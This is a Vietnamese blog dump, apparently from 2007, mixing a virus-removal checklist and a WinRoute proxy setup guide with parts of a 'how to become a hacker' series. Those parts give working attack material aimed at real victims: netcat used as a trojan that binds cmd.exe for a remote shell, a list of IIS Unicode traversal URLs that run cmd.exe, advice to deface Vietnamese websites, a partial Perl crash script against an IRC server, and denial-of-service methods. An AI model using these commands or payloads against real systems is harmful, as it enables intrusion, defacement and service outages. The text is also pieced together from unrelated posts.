23. delete at Handy drive and floppy disk too.
24. by Shift+Delete .
25. open --- C:WINDOWS for
26. delete MS32DLL.dll.vbs by Shift+Delete too.
27. Start-->Run --> gõ vào "regedit" rồi chọn ok.
28. choose "HKEY_LOCAL_MACHINE --> Software --> Current Version --> Run "
29. delete MS32DLL by press "delete" at keyboard.
30. delete!!!!!
31. HKEY_CURRENT_USER --> Software --> Microsoft --> Internet Explorer --> Main
32. delete file at Window Title "Hacked by Godzilla"
33. by press "Delete"
34. Start --> Run gõ " gpedit.msc" --> ok
35. afterwards
36. appear dialog " Group Policy"
37. choose , User Configuration --> Administrative Templates --> System --> Double Click file Turn off Autoplay
38. appear dialog "turn off Autoplay properties
39. click to choose "Enabled"
40. choose "All Drives"
41. click "ok"
42. afterwards
43. Start --> Run print " msconfig" then ok
44. appear dialog "System Configuration Utility"
45. choose Tap "Startup"
46. no mark in front file MS32DLL
47. press "Apply"
48. press "ok" or "Close"
49. appear dialog box "System Configuration"
50. choose "Exit Wihtout Restart"
51. Double Click "My Computer"
52. choose ----Menu Tools ---> Folder options
53. Tap View
54. no mark in font "Hide extention… and Hide protected operating system file
55. press "OK"
56. last step.
57. right click at Recycle bin
58. choose "Shortcut Menu"
59. choose command "Empty Recycle bin"

mình dc biết có vài soft antivirus diệt dc loại VBS này , xin giới thiệu với bạn
Panda 9.0 , McAfee , Kaspersky , symantec antivirus 9. ( nhớ update tới ngày 01/02/2007 nhé
tắt chức năng System Restore đi sau đó quét toàn bộ hệ thống trong chế độ Safe Mode )

Cấu hình Winrouter

2007-06-21T05:04:00.001-07:00

Mình có tìm được ở một trang khác có tài liệu hướng dẫn config WinRoute, mình trích một đoạn gởi cho bạn xem nha.

(Cảm ơn tác giả của bài viết này)

WinRoute Server
Ðể có thể cấu hình Winroute bạn phải khởi động Winroute Engine Monitor. Có thể chạy Winroute Engine Monitor bằng hai cách

Start -> Program -> WinRoute Pro -> Winroute Engine Monitor hoặc
Start -> Settings -> Control Panel -> Services -> Start (NT), tương tự với Win2000

Nếu thấy xuất hiện hình tròn nhỏ màu xanh nằm dưới góc phải thì Winroute đã hoạt động. Còn nếu xuất hiện vòng tròn màu đỏ thì Winroute đã bị stop. Bạn có thể khởi động nó bằng cách như trên.

Sau khi khởi động Winroute xong bạn bấm chuột phải vào biểu tượng Winroute và chọn Winroute Administration, cửa sổ Open Configuration sẽ xuất hiện:
Lần đầu tiên khi chạy Winroute Administration, bạn chỉ việc bấm OK.
Không cần gõ password
Bạn có thể đổi password bằng cách chọn Settings --> Accounts: xuất hiện cửa sổ User Accounts. Trong Tab Users chọn Admin và chọn tiếp Edit. Gõ password mới trong hàng Password và Confirm. Không cần chọn Use Windows NT logon authentication. Tuy nhiên bạn vẫn có thể lấy lại trong trường hợp bạn mất password

Winroute Proxy Server

Tab General

Từ cửa sổ Winroute Administration, bạn chọn Settings -> Proxy Server, xuất hiện cửa sổ Proxy Server Settings, bạn đánh dấu vào ô Proxy Server Enabled, và Proxy port là 3128

Tab Cache: Ðánh dấu vào ô cache enable. Nếu như bạn disable cache thì mỗi trang web sẽ được tải trực tiếp từ Internet

Bạn có thể tăng giảm độ lớn của cache cho Winroute tùy ý, mặc nhiên sẽ là 20MB. Nếu dung lượng ổ cứng của bạn còn rộng rãi bạn có thể tăng cache lên tối đa, maximum là 2GB.
Tab Access

Trong tab Access này bạn có thể cho hoặc không cho quyền truy nhập vào một trang Web nào đó bằng cách bấm vào nút Insert và gõ vào hàng URL địa chỉ trang Web đó, bấm OK. Các máy client sẽ không mở được trang web này.

Ngoài ra có thể cấu hình cho WinRoute từ bất kỳ máy nào trong mạng Lan bằng cách copy file "WrAdmin.exe" trong C:\Program files\Winroute Pro sang một máy nào đó và chỉ việc kích hoạt nó. Khi chạy file "WrAdmin.exe" cửa sổ Open Configuration vẫn xuất hiện giống như hình 3, chỉ khác dòng WinRoute Host: gõ địa chỉ IP hoặc host name của máy cài Winroute (Server).

Password Admin Winroute

Trường hợp bạn mất password Admin Winroute mà không muốn cài lại, bạn vẫn có thể lấy lại như sau:

Ðóng cửa sổ Administrator Administration

Stop Win Route Engine.

Chọn Start --> Run : gõ regedit

Vào HKEY_LOCAL_MACHINE\Software\TinySoftware\WinRouteP ro\User

Tìm đến khóa số ( thường là số 0 ) với tên là "name" có giá trị là Admin

Thay đổi tên "name" này thành một tên khác bất kỳ ( ví dụ như OldAdmin )

Sau đó vào HKEY_LOCAL_MACHINE\Software\TinySoftware\WinRouteP ro, tìm đến tên "AdminUserAdded" và đổi giá trị thành 0 ( mặc nhiên là 1 )

Sau đó chạy WinRoute Engine Monitor, vào WinRoute Administration

Tất cả những quá trình này sẽ làm cho Winroute chạy như lần đầu tiên và sẽ tạo ra account Administrator mới với tên mặc nhiên là Admin và password trống.

Tiếp tục vào menu Settings --> User accounts, xóa user OldAdmin.
Cấu hình trên máy con (Client) đối với Winroute
I. Cấu hình cho Browser
Bạn mở Internet Explorer, chọn Tools --> Internet Options

Bấm Tab Connections , chọn LAN Settings

Bạn đánh dấu vào mục Use a proxy server. Hàng Address: gõ IP máy chủ (server). Port: 3128, bấm OK.

Những Hiểu Biết Cơ Bản Để Trở Thành Hacker (phần VIII)

2007-06-19T01:18:00.001-07:00

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 8

47.) Các công cụ cần thiết để hack Web :

Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những công cụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụng trên máy của mình để test lỗi . Nhưng đối với các bạn mới “vào nghề” thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạn sẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhân được nhanh chóng nhất . Sau đây là một số công cụ bạn cần phải có trên máy “làm ăn” của mình :

Công cụ thứ 1 : Một cái proxy dùng để che dấu IP và vượt tường lửa khi cần ( Cách tạo 1 cái Proxy tôi đã bày ở phần 7 , các bạn hãy xem lại nhé ) .
Công cụ thứ 2 : Bạn cần có 1 shell account, cái này thực sự quan trọng đối với bạn . Một shell account tốt là 1 shell account cho phép bạn chạy các chương trình chính như nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...và shell account đó cần phải cài chương trình GCC ( rất quan trọng trong việc dịch (compile) các exploit được viết bằng C) như MinGW, Cygwin và các dev tools khác.
Shell account gần giống với DOS shell,nhưng nó có nhiều câu lệnh và chức năng hơn DOS . Thông thường khi bạn cài Unix thì bạn sẽ có 1 shell account, nếu bạn không cài Unix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu có ai đó cài Unix và thiết lập cho bạn 1 shell account thì bạn có thể log vào telnet (Start -- > Run -- > gõ Telnet) để dùng shell account đó. Sau đây là 1 số địa chỉ bạn có thể đăng ký free shell account :
http://www.freedomshell.com/
http://www.cyberspace.org/shell.html
http://www.ultrashell.net/

Công cụ thứ 3 : NMAP là Công cụ quét cực nhanh và mạnh. Có thể quét trên mạng diện rộng và đặc biệt tốt đối với mạng đơn lẻ. NMAP giúp bạn xem những dịch vụ nào đang chạy trên server (services / ports : webserver , ftpserver , pop3,...),server đang dùng hệ điều hành gì,loại tường lửa mà server sử dụng,...và rất nhiều tính năng khác.Nói chung NMAP hỗ trợ hầu hết các kỹ thuật quét như : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP được đánh giá là công cụ hàng đầu của các Hacker cũng như các nhà quản trị mạng trên thế giới.
Mọi thông tin về NMAP bạn tham khảo tại http://www.insecure.org/ .
Công cụ thứ 4 : Stealth HTTP Security Scanner là công cụ quét lỗi bảo mật tuyệt vời trên Win32. Nó có thể quét được hơn 13000 lỗi bảo mật và nhận diện được 5000 exploits khác.
Công cụ thứ 5 : IntelliTamper là công cụ hiển thị cấu trúc của một Website gồm những thư mục và file nào, nó có thể liệt kê được cả thư mục và file có set password. Rất tiện cho việc Hack Website vì trước khi bạn Hack một Website thì bạn phải nắm một số thông tin của Admin và Website đó.
Công cụ thứ 6 : Netcat là công cụ đọc và ghi dữ liệu qua mạng thông qua giao thức TCP hoặc UDP. Bạn có thể dùng Netcat 1 cách trực tiếp hoặc sử dụng chương trình script khác để điều khiển Netcat. Netcat được coi như 1 exploitation tool do nó có thể tạo được liên kết giữa bạn và server cho việc đọc và ghi dữ liệu ( tất nhiên là khi Netcat đã được cài trên 1 server bị lỗI ). Mọi thông tin về Netcat bạn có thể tham khảo tại http://www.l0pht.com/ .
Công cụ thứ 7 : Active Perl là công cụ đọc các file Perl đuôi *.pl vì các exploit thường được viết bằng Perl . Nó còn được sử dụng để thi hành các lệnh thông qua các file *.pl .
Công cụ thứ 8 : Linux là hệ điều hành hầu hết các hacker đều sử dụng.
Công cụ thứ 9 : L0phtCrack là công cụ số một để Crack Password của Windows NT/2000 .
Cách Download tôi đã bày rồi nên không nói ở đây , các bạn khi Download nhớ chú ý đến các phiên bản của chúng , phiên bản nào có số lớn nhất thì các bạn hãy Down về mà sài vì nó sẽ có thêm một số tính năng mà các phiên bản trước chưa có . Nếu down về mà các bạn không biết sử dụng thì tìm lại các bài viết cũ có hướng dẫn bên Box “Đồ nghề” . Nếu vẫn không thấy thì cứ post bài hỏi , các bạn bên đó sẽ trả lời cho bạn .

48.) Hướng dẫn sử dụng Netcat :

a . ) Giới thiệu : Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó vì nó rất mạnh và tiện dụng . Do đó bạn cần biết một chút về Netcat .
b . ) Biên dịch :
_ Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.
- hiệu chỉnh file netcat.c bằng vi: vi netcat.c
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu ``/``: // res_init();
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):

#define GAPING_SECURITY_HOLE
#define TELNET

- biên dịch: make linux
- chạy thử: ./nc -h
- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ``:.``
PATH=/sbin:/usr/sbin:...:.
_ Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong.
c . ) Các tùy chọn của Netcat :
_ Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:

CODE
C:\ > nc -h
connect to somewhere: nc [-options] hostname port [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d ----------- tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar)
-e prog --- thi hành chương trình prog, thường dùng trong chế độ lắng nghe
-h ----------- gọi hướng dẫn
-i secs ----- trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi
-l ------------- đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến
-L ------------ buộc Netcat ``cố`` lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-n ------------ chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS
-o ------------ file ghi nhật kí vào file
-p port ----- chỉ định cổng port
-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)
-s addr ----- giả mạo địa chỉ IP nguồn là addr
-t ------------- không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd.
-u ------------- dùng UDP(mặc định netcat dùng TCP)
-v ------------- hiển thị chi tiết các thông tin về kết nối hiện tại.
-vv ----------- sẽ hiển thị thông tin chi tiết hơn nữa.
-w secs ---- đặt thời gian timeout cho mỗi kết nối là secs mili giây
-z ------------- chế độ zero I/O, thường được sử dụng khi scan port

Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080

d . ) Tìm hiểu Netcat qua các VD :

_ Chộp banner của web server :

Ví dụ: nc đến 172.16.84.2, cổng 80

CODE
C:\ > nc 172.16.84.2 80
HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html

Để biết thông tin chi tiết về kết nối, bạn có thể dùng –v ( -vv sẽ
cho biết các thông tin chi tiết hơn nữa)

C:\ > nc -vv 172.16.84.1 80

CODE
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: ``0-cec-3899eaea``
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK

Nếu muốn ghi nhật kí, hãy dùng -o . Ví dụ:

nc -vv -o nhat_ki.log 172.16.84.2 80

xem file nhat_ki.log xem thử nó đã ghi những gì nhé :

CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: ``0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea``..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....

dấu < nghĩa là server gởi đến netcat
dấu > nghĩa là netcat gởi đến server

_ Quét cổng :
Bạn hãy chạy netcat với tùy chọn –z . Nhưng để quét cổng nhanh hơn, bạn hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1- > 500) của host 172.16.106.1

CODE
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open

nếu bạn cần scan các cổng UDP, dùng -u

CODE
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open

_ Biến Netcat thành một trojan :
Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn –l ( listen ) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe ( đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:

CODE
E:\ > nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error

Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080

CODE
C:\ > nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-1999 Microsoft Corp.
E:\ > cd test
cd test
E:\test > dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
C:\test > exit
exit
sent 20, rcvd 450: NOTSOCK

Như các bạn đã thấy , ta có thể làm những gì trên máy của nạn nhân rồi , chỉ cần một số lệnh cơ bản , ta đã chiếm được máy tính của đối phương , các bạn hãy xem tiếp nhé :

CODE
E:\ > nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...?
?

Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s<địa_chỉ_ip_của_máy_này > . Ví dụ:

CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe
...
E:\ > nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 - > lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163?
?

Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.
Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.

( Dựa theo bài viết của huynh Vicky )

49.) Kỹ thuật hack IIS server 5.0 :

_ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều có lỗi để ta có thể khai thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên lỗi ở các phiên bản trước tôi không đề cập đến . Bây giờ tôi sẽ bày các bạn cách hack thông qua công cụ activeperl và IE , các bạn có thể vận dụng cho các trang Web ở VN vì chúng bị lỗi này rất nhiều . Ta hãy bắt đầu nhé .
_ Trước hết các bạn hãy download activeperl và Unicode.pl .
_ Sử dụng telnet để xác định trang Web ta tấn công có sử dụng IIS server 5.0 hay không :

CODE
telnet < tên trang Web > 80
GET HEAD / HTTP/1.0

Nếu nó không báo cho ta biết mục tiêu đang sử dụng chương trình gì thì các bạn hãy thay đổi cổng 80 bằng các cổng khác như 8080, 81, 8000, 8001 .v.v…
_ Sau khi đã xác định được mục tiêu các bạn vào DOS gõ :

CODE
perl unicode.pl
Host: ( gõ địa chỉ server mà các bạn muốn hack )
Port: 80 ( hoặc 8080, 81, 8000, 8001 tuỳ theo cổng mà ta đã telnet trước đó ) .

_ Các bạn sẽ thấy bảng liệt kê lỗi ( đã được lập trình trong Unicode.pl ) như sau :

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe ?/c+
[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+
[14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0 \%80\%af../winnt/system32/cmd.exe?/c+
[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+
[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+

Các bạn sẽ thấy được tất cả các lỗi trên nếu trang Web nạn nhân bị tất cả những lỗi như vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17 thì bảng kết quả chỉ xuất hiện dòng thứ 13 và 17 mà thôi .
Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7 , tôi sẽ ra IE và nhập đoạn mã tương ứng trên Address :

http://www.xxx.com/scripts/..%c1%p c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 3
hoặc
http://www.xxx.com/scripts/..%c1%1 c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 7

Đến đây các bạn đã có thể xâm nhập vào server của nạn nhân rồi đó , các bạn hãy sử dụng lệnh trong DOS mà khai thác thông tin trong này . Thông thường các trang Web nằm ở thư mục vinetpub\wwwroot , các bạn vào được rồI thì chỉ cần thay index.html vớI tên hack by …. Là được rồi , đừng quậy họ nhé .

GOOKLUCK!!!!!!!!!!!!!!!

( Hết phần 8 )

Những Hiểu Biết Cơ Bản Để Trở Thành Hacker (phần VII)

2007-06-19T01:17:00.000-07:00

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7

42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :

WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667.
Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667:

Nếu bạn dùng Unix:

[hellme@die-communitech.net$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is `^]`.
[buffer]

Windows cũng tương tự:

telnet irc.example.com 6667

Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự .
Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu . Nào , chúng ta hãy phân tích nó một cách căn bản ):

CODE
#!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl
use Getopt::Std;
use Socket;
getopts(`s:`, \%args);
if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$pa ddr,$proto);
$foo = ``A``; # Đây là NOP
$number = ``65000``; # Đây là tất cả số NOP
$data .= $foo x $number; # kết quả của $foo times $number
$serv = $args{s}; # lệnh điều khiển server từ xa
$port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667
$buf = ``$data``;
$in_addr = (gethostbyname($serv))[4]

Những Hiểu Biết Cơ Bản Để Trở Thành Hacker (phần VI)

2007-06-19T01:16:00.004-07:00

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 6

DoS attack là gì? ( Denial Of Services Attack )

DoS attack ( dịch là tấn công từ chối dịch vụ ) là kiểu tấn công rất lợi hại , với loại tấn công này , bạn chỉ cần một máy tính kết nối Internet là đã có thể thực hiện việc tấn công được máy tính của đốI phương . thực chất của DoS attack là hacker sẽ chiếm dụng một lượng lớn tài nguyên trên server ( tài nguyên đó có thể là băng thông, bộ nhớ, cpu, đĩa cứng, ... ) làm cho server không thể nào đáp ứng các yêu cầu từ các máy của nguời khác ( máy của những người dùng bình thường ) và server có thể nhanh chóng bị ngừng hoạt động, crash hoặc reboot .

39.) Các loại DoS attack hiện đang được biết đến và sử dụng :

a . ) Winnuke :

_DoS attack loại này chỉ có thể áp dụng cho các máy tính đang chạy Windows9x . Hacker sẽ gởi các gói tin với dữ liệu ``Out of Band`` đến cổng 139 của máy tính đích.( Cổng 139 chính là cổng NetBIOS, cổng này chỉ chấp nhận các gói tin có cờ Out of Band được bật ) . Khi máy tính của victim nhận được gói tin này, một màn hình xanh báo lỗi sẽ được hiển thị lên với nạn nhân do chương trình của Windows nhận được các gói tin này nhưng nó lại không biết phản ứng với các dữ liệu Out Of Band như thế nào dẫn đến hệ thống sẽ bị crash .

b . ) Ping of Death :

_ Ở kiểu DoS attack này , ta chỉ cần gửi một gói dữ liệu có kích thước lớn thông qua lệnh ping đến máy đích thì hệ thống của họ sẽ bị treo .
_ VD : ping –l 65000

c . ) Teardrop :

_ Như ta đã biết , tất cả các dữ liệu chuyển đi trên mạng từ hệ thống nguồn đến hệ thống đích đều phải trải qua 2 quá trình : dữ liệu sẽ được chia ra thành các mảnh nhỏ ở hệ thống nguồn, mỗi mảnh đều phải có một giá trị offset nhất định để xác định vị trí của mảnh đó trong gói dữ liệu được chuyển đi. Khi các mảnh này đến hệ thống đích, hệ thống đích sẽ dựa vào giá trị offset để sắp xếp các mảnh lại với nhau theo thứ tự đúng như ban đầu . Lợi dụng sơ hở đó , ta chỉ cần gởi đến hệ thống đích một loạt gói packets với giá trị offset chồng chéo lên nhau. Hệ thống đích sẽ không thể nào sắp xếp lại các packets này, nó không điều khiển được và có thể bị crash, reboot hoặc ngừng hoạt động nếu số lượng gói packets với giá trị offset chồng chéo lên nhau quá lớn !

d . ) SYN Attack :

_ Trong SYN Attack, hacker sẽ gởi đến hệ thống đích một loạt SYN packets với địa chỉ ip nguồn không có thực. Hệ thống đích khi nhận được các SYN packets này sẽ gởi trở lại các địa chỉ không có thực đó và chờ đợI để nhận thông tin phản hồi từ các địa chỉ ip giả . Vì đây là các địa chỉ ip không có thực, nên hệ thống đích sẽ sẽ chờ đợi vô ích và còn đưa các ``request`` chờ đợi này vào bộ nhớ , gây lãng phí một lượng đáng kể bộ nhớ trên máy chủ mà đúng ra là phải dùng vào việc khác thay cho phải chờ đợi thông tin phản hồi không có thực này . Nếu ta gởi cùng một lúc nhiều gói tin có địa chỉ IP giả như vậy thì hệ thống sẽ bị quá tải dẫn đến bị crash hoặc boot máy tính . == > ném đá dấu tay .

e . ) Land Attack :

_ Land Attack cũng gần giống như SYN Attack, nhưng thay vì dùng các địa chỉ ip không có thực, hacker sẽ dùng chính địa chỉ ip của hệ thống nạn nhân. Điều này sẽ tạo nên một vòng lặp vô tận giữa trong chính hệ thống nạn nhân đó, giữa một bên cần nhận thông tin phản hồi còn một bên thì chẳng bao giờ gởi thông tin phản hồi đó đi cả . == > Gậy ông đập lưng ông .

f . ) Smurf Attack :

_Trong Smurf Attack, cần có ba thành phần: hacker (người ra lệnh tấn công), mạng khuếch đại (sẽ nghe lệnh của hacker) và hệ thống của nạn nhân. Hacker sẽ gởi các gói tin ICMP đến địa chỉ broadcast của mạng khuếch đại. Điều đặc biệt là các gói tin ICMP packets này có địa chỉ ip nguồn chính là địa chỉ ip của nạn nhân . Khi các packets đó đến được địa chỉ broadcast của mạng khuếch đại, các máy tính trong mạng khuếch đại sẽ tưởng rằng máy tính nạn nhân đã gởi gói tin ICMP packets đến và chúng sẽ đồng loạt gởi trả lại hệ thống nạn nhân các gói tin phản hồi ICMP packets. Hệ thống máy nạn nhân sẽ không chịu nổi một khối lượng khổng lồ các gói tin này và nhanh chóng bị ngừng hoạt động, crash hoặc reboot. Như vậy, chỉ cần gởi một lượng nhỏ các gói tin ICMP packets đi thì hệ thống mạng khuếch đại sẽ khuếch đại lượng gói tin ICMP packets này lên gấp bộI . Tỉ lệ khuếch đại phụ thuộc vào số mạng tính có trong mạng khuếch đạI . Nhiệm vụ của các hacker là cố chiếm được càng nhiều hệ thống mạng hoặc routers cho phép chuyển trực tiếp các gói tin đến địa chỉ broadcast không qua chỗ lọc địa chỉ nguồn ở các đầu ra của gói tin . Có được các hệ thống này, hacker sẽ dễ dàng tiến hành Smurf Attack trên các hệ thống cần tấn công . == > một máy làm chẳng si nhê , chục máy chụm lại ta đành chào thua .

g . ) UDP Flooding :

